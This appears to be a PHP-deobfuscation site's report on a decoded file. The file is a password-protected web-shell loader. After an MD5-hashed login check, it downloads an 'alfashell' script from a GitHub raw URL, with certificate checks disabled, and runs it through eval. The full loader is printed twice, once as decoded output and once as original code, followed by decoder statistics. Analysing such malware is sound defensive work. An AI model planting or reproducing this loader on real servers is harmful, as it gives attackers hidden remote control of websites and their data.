Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); /** * Disable error reporting * * Set this to error_re..

Decoded Output download

<?php 
session_start(); 
 
/** 
 
* Disable error reporting 
 
* 
 
* Set this to error_reporting( -1 ) for debugging. 
 
*/ 
 
function geturlsinfo($url) { 
 
   if (function_exists('curl_exec')) { 
 
       $conn = curl_init($url); 
 
       curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); 
 
       curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); 
 
       curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); 
 
       curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); 
 
       curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); 
 
 
 
       // Set cookies using session if available 
 
       if (isset($_SESSION['SAP'])) { 
 
           curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['SAP']); 
 
       } 
 
 
 
       $url_get_contents_data = curl_exec($conn); 
 
       curl_close($conn); 
 
   } elseif (function_exists('file_get_contents')) { 
 
       $url_get_contents_data = file_get_contents($url); 
 
   } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { 
 
       $handle = fopen($url, "r"); 
 
       $url_get_contents_data = stream_get_contents($handle); 
 
       fclose($handle); 
 
   } else { 
 
       $url_get_contents_data = false; 
 
   } 
 
   return $url_get_contents_data; 
 
} 
 
 
 
// Function to check if the user is logged in 
 
function is_logged_in() 
 
{ 
 
   return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; 
 
} 
 
// Check if the password is submitted and correct 
 
if (isset($_POST['password'])) { 
 
   $entered_password = $_POST['password']; 
 
   $hashed_password = 'ceae7417ffd77fb5a7e12716431066b6';  
 
   if (md5($entered_password) === $hashed_password) { 
 
       // Password is correct, store it in session 
 
       $_SESSION['logged_in'] = true; 
 
       $_SESSION['SAP'] = 'biadap'; // Replace this with your cookie data 
 
   } else { 
 
       // Password is incorrect 
 
       echo "Incorrect password. Please try again."; 
 
   } 
 
} 
 
 
 
// Check if the user is logged in before executing the content 
 
if (is_logged_in()) { 
 
   $a = geturlsinfo('https://raw.githubusercontent.com/kurtcobain555/fileshell/main/alfashell.txt'); 
 
   eval('?>' . $a); 
 
} else { 
 
   // Display login form if not logged in 
 
   ?> 
 
   <!DOCTYPE html> 
 
   <html> 
 
   <head> 
 
       <title>login dulu bang</title> 
 
   </head> 
 
   <body> 
 
       <center> 
 
       <img src="" /> 
 
       <body style="background-color:black;"> 
 
       <form method="POST" action=""> 
 
           <label for="password">Password:</label> 
 
           <input type="password" id="password" name="password"> 
 
           <input type="submit" value="Touch Me!"> 
 
       </form> 
 
       </center> 
 
   </body> 
 
   </html> 
 
   <?php 
 
} 
 
?>

Did this file decode correctly?

Original Code

<?php
session_start();

/**

* Disable error reporting

*

* Set this to error_reporting( -1 ) for debugging.

*/

function geturlsinfo($url) {

   if (function_exists('curl_exec')) {

       $conn = curl_init($url);

       curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);

       curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);

       curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");

       curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0);

       curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0);



       // Set cookies using session if available

       if (isset($_SESSION['SAP'])) {

           curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['SAP']);

       }



       $url_get_contents_data = curl_exec($conn);

       curl_close($conn);

   } elseif (function_exists('file_get_contents')) {

       $url_get_contents_data = file_get_contents($url);

   } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {

       $handle = fopen($url, "r");

       $url_get_contents_data = stream_get_contents($handle);

       fclose($handle);

   } else {

       $url_get_contents_data = false;

   }

   return $url_get_contents_data;

}



// Function to check if the user is logged in

function is_logged_in()

{

   return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true;

}

// Check if the password is submitted and correct

if (isset($_POST['password'])) {

   $entered_password = $_POST['password'];

   $hashed_password = 'ceae7417ffd77fb5a7e12716431066b6'; 

   if (md5($entered_password) === $hashed_password) {

       // Password is correct, store it in session

       $_SESSION['logged_in'] = true;

       $_SESSION['SAP'] = 'biadap'; // Replace this with your cookie data

   } else {

       // Password is incorrect

       echo "Incorrect password. Please try again.";

   }

}



// Check if the user is logged in before executing the content

if (is_logged_in()) {

   $a = geturlsinfo('https://raw.githubusercontent.com/kurtcobain555/fileshell/main/alfashell.txt');

   eval('?>' . $a);

} else {

   // Display login form if not logged in

   ?>

   <!DOCTYPE html>

   <html>

   <head>

       <title>login dulu bang</title>

   </head>

   <body>

       <center>

       <img src="" />

       <body style="background-color:black;">

       <form method="POST" action="">

           <label for="password">Password:</label>

           <input type="password" id="password" name="password">

           <input type="submit" value="Touch Me!">

       </form>

       </center>

   </body>

   </html>

   <?php

}

?>

Function Calls

md5 1
geturlsinfo 1
is_logged_in 1
session_start 1
function_exists 1

Variables

$a False
$url https://raw.githubusercontent.com/kurtcobain555/fileshell/ma..
$_SESSION [{'key': 'logged_in', 'value': True}, {'key': 'SAP', 'value': 'biadap'}]
$hashed_password ceae7417ffd77fb5a7e12716431066b6
$entered_password None
$url_get_contents_data False

Stats

MD5 3b96712ea6cc504e5deb021cdfc85d4e
Eval Count 1
Decode Time 115 ms